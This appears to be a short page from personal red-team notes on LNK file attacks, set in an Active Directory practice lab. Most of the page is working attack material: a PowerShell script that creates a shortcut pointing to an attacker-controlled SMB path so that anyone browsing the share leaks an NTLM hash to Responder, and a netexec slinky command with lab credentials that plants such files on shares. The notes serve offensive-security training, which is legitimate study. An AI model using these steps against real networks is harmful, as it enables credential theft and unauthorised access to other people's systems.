🗄️LNK File Attacks

$objShell = New-Object -ComObject WScript.shell
$lnk = $objShell.CreateShortcut("C:\test.lnk")
$lnk.TargetPath = "\\192.168.138.149\@test.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "Test"
$lnk.HotKey = "Ctrl+Alt+T"
$lnk.Save()

What will happen if we have responder listening and this file is triggered, we will get a hash and force auth:

good example:

everyone who will interact with this share will send us a hash, very malicious

A good thing to know is :

netexec smb 192.168.138.137 -d marvel.local -u fcastle -p Password1 -M slinky -o NAME=test SERVER=192.168.138.149

CME Slinky (smb) - InfosecMatterInfosecMatter

WelcomeNetExec

Forced Authentication | Red Team Notes

PreviousToken Impersonation NextGPP / cPassword Attacks

Last updated 3 months ago